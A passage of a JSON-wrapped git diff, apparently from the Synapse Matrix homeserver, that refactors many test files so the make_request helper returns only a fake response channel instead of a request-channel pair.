RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(params)", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -119,3 +119,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -129,3 +129,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "@@ -138,3 +138,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "@@ -147,3 +147,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " url = self.url + b\"?kind=guest\"", + "- request, channel = self.make_request(b\"POST\", url, b\"{}\")", + "+ channel = self.make_request(b\"POST\", url, b\"{}\")", + "@@ -157,3 +157,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "@@ -171,3 +171,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(params)", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -181,3 +181,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url + b\"?kind=guest\", b\"{}\")", + "@@ -186,3 +186,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " def test_advertised_flows(self):", + "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", + " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", + "@@ -209,3 +209,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " def test_advertised_flows_captcha_and_terms_and_3pids(self):", + "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", + " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", + "@@ -241,3 +241,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " def test_advertised_flows_no_msisdn_email_required(self):", + "- request, channel = self.make_request(b\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(b\"POST\", self.url, b\"{}\")", + " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", + "@@ -281,3 +281,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -320,3 +320,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " # endpoint.", + "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "@@ -326,3 +326,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "@@ -348,5 +348,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(params)", + "- request, channel = self.make_request(", + "- b\"POST\", url, request_data, access_token=admin_tok", + "- )", + "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -355,3 +353,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " # endpoint.", + "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -372,5 +370,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(params)", + "- request, channel = self.make_request(", + "- b\"POST\", url, request_data, access_token=admin_tok", + "- )", + "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -379,3 +375,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " # endpoint.", + "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"403\", channel.result)", + "@@ -399,5 +395,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(params)", + "- request, channel = self.make_request(", + "- b\"POST\", url, request_data, access_token=admin_tok", + "- )", + "+ channel = self.make_request(b\"POST\", url, request_data, access_token=admin_tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -405,3 +399,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " # Try to log the user out", + "- request, channel = self.make_request(b\"POST\", \"/logout\", access_token=tok)", + "+ channel = self.make_request(b\"POST\", \"/logout\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -412,3 +406,3 @@ class AccountValidityTestCase(unittest.HomeserverTestCase):", + " # Try to log out all of the user's sessions", + "- request, channel = self.make_request(b\"POST\", \"/logout/all\", access_token=tok)", + "+ channel = self.make_request(b\"POST\", \"/logout/all\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -486,3 +480,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " url = \"/_matrix/client/unstable/account_validity/renew?token=%s\" % renewal_token", + "- request, channel = self.make_request(b\"GET\", url)", + "+ channel = self.make_request(b\"GET\", url)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -506,3 +500,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " self.reactor.advance(datetime.timedelta(days=3).total_seconds())", + "- request, channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + "+ channel = self.make_request(b\"GET\", \"/sync\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -513,3 +507,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " url = \"/_matrix/client/unstable/account_validity/renew?token=123\"", + "- request, channel = self.make_request(b\"GET\", url)", + "+ channel = self.make_request(b\"GET\", url)", + " self.assertEquals(channel.result[\"code\"], b\"404\", channel.result)", + "@@ -534,3 +528,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " (user_id, tok) = self.create_user()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\",", + "@@ -558,3 +552,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"account/deactivate\", request_data, access_token=tok", + "@@ -609,3 +603,3 @@ class AccountValidityRenewalByEmailTestCase(unittest.HomeserverTestCase):", + " # Test that we're still able to manually trigger a mail to be sent.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\",", + "diff --git a/tests/rest/client/v2_alpha/test_relations.py b/tests/rest/client/v2_alpha/test_relations.py", + "index 6cd4eb662..bd574077e 100644", + "--- a/tests/rest/client/v2_alpha/test_relations.py", + "+++ b/tests/rest/client/v2_alpha/test_relations.py", + "@@ -62,3 +62,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -109,3 +109,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -154,3 +154,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -212,3 +212,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -281,3 +281,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -327,3 +327,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -359,3 +359,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Now lets redact one of the 'a' reactions", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -367,3 +367,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -384,3 +384,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -416,3 +416,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -452,3 +452,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -509,3 +509,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -551,3 +551,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Check the relation is returned", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -563,3 +563,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Redact the original event", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -573,3 +573,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Try to check for remaining m.replace relations", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -600,3 +600,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Redact the original", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -614,3 +614,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + " # Check that aggregations returns zero", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -658,3 +658,3 @@ class RelationsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "diff --git a/tests/rest/client/v2_alpha/test_shared_rooms.py b/tests/rest/client/v2_alpha/test_shared_rooms.py", + "index 05c5ee5a7..116ace181 100644", + "--- a/tests/rest/client/v2_alpha/test_shared_rooms.py", + "+++ b/tests/rest/client/v2_alpha/test_shared_rooms.py", + "@@ -44,3 +44,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + " def _get_shared_rooms(self, token, other_user) -> FakeChannel:", + "- _, channel = self.make_request(", + "+ return self.make_request(", + " \"GET\",", + "@@ -50,3 +50,2 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + " )", + "- return channel", + "diff --git a/tests/rest/client/v2_alpha/test_sync.py b/tests/rest/client/v2_alpha/test_sync.py", + "index 31ac0fccb..512e36c23 100644", + "--- a/tests/rest/client/v2_alpha/test_sync.py", + "+++ b/tests/rest/client/v2_alpha/test_sync.py", + "@@ -37,3 +37,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_sync_argless(self):", + "- request, channel = self.make_request(\"GET\", \"/sync\")", + "+ channel = self.make_request(\"GET\", \"/sync\")", + "@@ -57,3 +57,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/sync\")", + "+ channel = self.make_request(\"GET\", \"/sync\")", + "@@ -196,3 +196,3 @@ class SyncFilterTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/sync?filter=%s\" % sync_filter, access_token=tok", + "@@ -247,3 +247,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + " # Start typing.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -254,5 +254,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", \"/sync?access_token=%s\" % (access_token,)", + "- )", + "+ channel = self.make_request(\"GET\", \"/sync?access_token=%s\" % (access_token,))", + " self.assertEquals(200, channel.code)", + "@@ -261,3 +259,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + " # Stop typing.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -269,3 +267,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + " # Start typing.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -277,5 +275,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + " # Should return immediately", + "- request, channel = self.make_request(", + "- \"GET\", sync_url % (access_token, next_batch)", + "- )", + "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", + " self.assertEquals(200, channel.code)", + "@@ -291,5 +287,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", sync_url % (access_token, next_batch)", + "- )", + "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", + " self.assertEquals(200, channel.code)", + "@@ -301,5 +295,3 @@ class SyncTypingTests(unittest.HomeserverTestCase):", + " # stream token.", + "- request, channel = self.make_request(", + "- \"GET\", sync_url % (access_token, next_batch)", + "- )", + "+ channel = self.make_request(\"GET\", sync_url % (access_token, next_batch))", + " self.assertEquals(200, channel.code)", + "@@ -385,3 +377,3 @@ class UnreadMessagesTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"m.read\": res[\"event_id\"]}).encode(\"utf8\")", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -452,3 +444,3 @@ class UnreadMessagesTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url % self.next_batch, access_token=self.tok,", + "diff --git a/tests/rest/media/v1/test_media_storage.py b/tests/rest/media/v1/test_media_storage.py", + "index 6f0677d33..ae2b32b13 100644", + "--- a/tests/rest/media/v1/test_media_storage.py", + "+++ b/tests/rest/media/v1/test_media_storage.py", + "@@ -230,3 +230,3 @@ class MediaRepoTests(unittest.HomeserverTestCase):", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -326,3 +326,3 @@ class MediaRepoTests(unittest.HomeserverTestCase):", + " params = \"?width=32&height=32&method=\" + method", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/rest/media/v1/test_url_preview.py b/tests/rest/media/v1/test_url_preview.py", + "index 529b6bcde..83d728b4a 100644", + "--- a/tests/rest/media/v1/test_url_preview.py", + "+++ b/tests/rest/media/v1/test_url_preview.py", + "@@ -115,3 +115,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -140,3 +140,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " # Check the cache returns the correct response", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://matrix.org\", shorthand=False", + "@@ -156,3 +156,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " # Check the database cache returns the correct response", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://matrix.org\", shorthand=False", + "@@ -177,3 +177,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -212,3 +212,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -247,3 +247,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -280,3 +280,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -310,3 +310,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -331,3 +331,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -348,3 +348,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://192.168.1.1\", shorthand=False", + "@@ -367,3 +367,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://1.1.1.2\", shorthand=False", + "@@ -387,3 +387,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -424,3 +424,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -444,3 +444,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -465,3 +465,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -482,3 +482,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"OPTIONS\", \"preview_url?url=http://example.com\", shorthand=False", + "@@ -495,3 +495,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + " # Build and make a request to the server", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -569,3 +569,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -634,3 +634,3 @@ class URLPreviewTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "diff --git a/tests/rest/test_health.py b/tests/rest/test_health.py", + "index aaf2fb821..32acd93dc 100644", + "--- a/tests/rest/test_health.py", + "+++ b/tests/rest/test_health.py", + "@@ -27,3 +27,3 @@ class HealthCheckTests(unittest.HomeserverTestCase):", + " def test_health(self):", + "- request, channel = self.make_request(\"GET\", \"/health\", shorthand=False)", + "+ channel = self.make_request(\"GET\", \"/health\", shorthand=False)", + "diff --git a/tests/rest/test_well_known.py b/tests/rest/test_well_known.py", + "index 17ded96b9..14de0921b 100644", + "--- a/tests/rest/test_well_known.py", + "+++ b/tests/rest/test_well_known.py", + "@@ -30,3 +30,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/.well-known/matrix/client\", shorthand=False", + "@@ -46,3 +46,3 @@ class WellKnownTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/.well-known/matrix/client\", shorthand=False", + "diff --git a/tests/server.py b/tests/server.py", + "index 4faf32e33..7d1ad362c 100644", + "--- a/tests/server.py", + "+++ b/tests/server.py", + "@@ -176,3 +176,3 @@ def make_request(", + " ] = None,", + "-):", + "+) -> FakeChannel:", + " \"\"\"", + "@@ -180,3 +180,3 @@ def make_request(", + "- Returns the Request and the Channel underneath.", + "+ Returns the fake Channel object which records the response to the request.", + "@@ -204,3 +204,3 @@ def make_request(", + " Returns:", + "- Tuple[synapse.http.site.SynapseRequest, channel]", + "+ channel", + " \"\"\"", + "@@ -267,3 +267,3 @@ def make_request(", + "- return req, channel", + "+ return channel", + "diff --git a/tests/server_notices/test_consent.py b/tests/server_notices/test_consent.py", + "index e0a9cd93a..4dd5a3617 100644", + "--- a/tests/server_notices/test_consent.py", + "+++ b/tests/server_notices/test_consent.py", + "@@ -72,3 +72,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", + " # Initial sync, to get the user consent room invite", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/sync\", access_token=self.access_token", + "@@ -81,3 +81,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", + " # Join the room", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -89,3 +89,3 @@ class ConsentNoticesTests(unittest.HomeserverTestCase):", + " # Sync again, to get the message in the room", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/sync\", access_token=self.access_token", + "diff --git a/tests/server_notices/test_resource_limits_server_notices.py b/tests/server_notices/test_resource_limits_server_notices.py", + "index 9c8027a5b..fea54464a 100644", + "--- a/tests/server_notices/test_resource_limits_server_notices.py", + "+++ b/tests/server_notices/test_resource_limits_server_notices.py", + "@@ -307,3 +307,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", + "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", + "@@ -320,3 +320,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", + " # room has a notice in it.", + "- request, channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", + "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok)", + "@@ -355,5 +355,3 @@ class TestResourceLimitsServerNoticesWithRealRooms(unittest.HomeserverTestCase):", + " # Sync with the user's token to mark the user as active.", + "- request, channel = self.make_request(", + "- \"GET\", \"/sync?timeout=0\", access_token=tok,", + "- )", + "+ channel = self.make_request(\"GET\", \"/sync?timeout=0\", access_token=tok,)", + "diff --git a/tests/test_mau.py b/tests/test_mau.py", + "index c5ec6396a..02e56e1b0 100644", + "--- a/tests/test_mau.py", + "+++ b/tests/test_mau.py", + "@@ -203,3 +203,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"POST\", \"/register\", request_data)", + "+ channel = self.make_request(\"POST\", \"/register\", request_data)", + "@@ -215,3 +215,3 @@ class TestMauLimit(unittest.HomeserverTestCase):", + " def do_sync_for_user(self, token):", + "- request, channel = self.make_request(\"GET\", \"/sync\", access_token=token)", + "+ channel = self.make_request(\"GET\", \"/sync\", access_token=token)", + "diff --git a/tests/test_server.py b/tests/test_server.py", + "index 0be8c7e2f..815da18e6 100644", + "--- a/tests/test_server.py", + "+++ b/tests/test_server.py", + "@@ -86,3 +86,3 @@ class JsonResourceTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "@@ -110,3 +110,3 @@ class JsonResourceTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "@@ -128,3 +128,3 @@ class JsonResourceTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foo\")", + "@@ -150,5 +150,3 @@ class JsonResourceTests(unittest.TestCase):", + "- _, channel = make_request(", + "- self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foobar\"", + "- )", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foobar\")", + "@@ -174,3 +172,3 @@ class JsonResourceTests(unittest.TestCase):", + " # The path was registered as GET, but this is a HEAD request.", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/_matrix/foo\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/_matrix/foo\")", + "@@ -206,3 +204,3 @@ class OptionsResourceTests(unittest.TestCase):", + " # render the request and return the channel", + "- _, channel = make_request(self.reactor, site, method, path, shorthand=False)", + "+ channel = make_request(self.reactor, site, method, path, shorthand=False)", + " return channel", + "@@ -279,3 +277,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "@@ -297,3 +295,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "@@ -318,3 +316,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", + "@@ -337,3 +335,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", + "- _, channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/path\")", + "+ channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/path\")", + "diff --git a/tests/test_terms_auth.py b/tests/test_terms_auth.py", + "index 71580b454..a743cdc3a 100644", + "--- a/tests/test_terms_auth.py", + "+++ b/tests/test_terms_auth.py", + "@@ -55,3 +55,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"monkey\"})", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -98,3 +98,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -115,3 +115,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "diff --git a/tests/unittest.py b/tests/unittest.py", + "index 102b0a1f3..16fd4f32b 100644", + "--- a/tests/unittest.py", + "+++ b/tests/unittest.py", + "@@ -374,34 +374,2 @@ class HomeserverTestCase(TestCase):", + "- # Annoyingly mypy doesn't seem to pick up the fact that T is SynapseRequest", + "- # when the `request` arg isn't given, so we define an explicit override to", + "- # cover that case.", + "- @overload", + "- def make_request(", + "- self,", + "- method: Union[bytes, str],", + "- path: Union[bytes, str],", + "- content: Union[bytes, dict] = b\"\",", + "- access_token: Optional[str] = None,", + "- shorthand: bool = True,", + "- federation_auth_origin: str = None,", + "- content_is_form: bool = False,", + "- await_result: bool = True,", + "- ) -> Tuple[SynapseRequest, FakeChannel]:", + "- ...", + "-", + "- @overload", + "- def make_request(", + "- self,", + "- method: Union[bytes, str],", + "- path: Union[bytes, str],", + "- content: Union[bytes, dict] = b\"\",", + "- access_token: Optional[str] = None,", + "- request: Type[T] = SynapseRequest,", + "- shorthand: bool = True,", + "- federation_auth_origin: str = None,", + "- content_is_form: bool = False,", + "- await_result: bool = True,", + "- ) -> Tuple[T, FakeChannel]:", + "- ...", + "-", + " def make_request(", + "@@ -417,3 +385,3 @@ class HomeserverTestCase(TestCase):", + " await_result: bool = True,", + "- ) -> Tuple[T, FakeChannel]:", + "+ ) -> FakeChannel:", + " \"\"\"", + "@@ -440,3 +408,3 @@ class HomeserverTestCase(TestCase):", + " Returns:", + "- Tuple[synapse.http.site.SynapseRequest, channel]", + "+ The FakeChannel object which stores the result of the request.", + " \"\"\"", + "@@ -570,3 +538,3 @@ class HomeserverTestCase(TestCase):", + " # Create the user", + "- request, channel = self.make_request(\"GET\", \"/_synapse/admin/v1/register\")", + "+ channel = self.make_request(\"GET\", \"/_synapse/admin/v1/register\")", + " self.assertEqual(channel.code, 200, msg=channel.result)", + "@@ -595,3 +563,3 @@ class HomeserverTestCase(TestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/_synapse/admin/v1/register\", body.encode(\"utf8\")", + "@@ -613,3 +581,3 @@ class HomeserverTestCase(TestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/_matrix/client/r0/login\", json.dumps(body).encode(\"utf8\")", + "@@ -681,3 +649,3 @@ class HomeserverTestCase(TestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/_matrix/client/r0/login\", json.dumps(body).encode(\"utf8\")" + ], + "changed_files": [ + "tests/app/test_frontend_proxy.py", + "tests/app/test_openid_listener.py", + 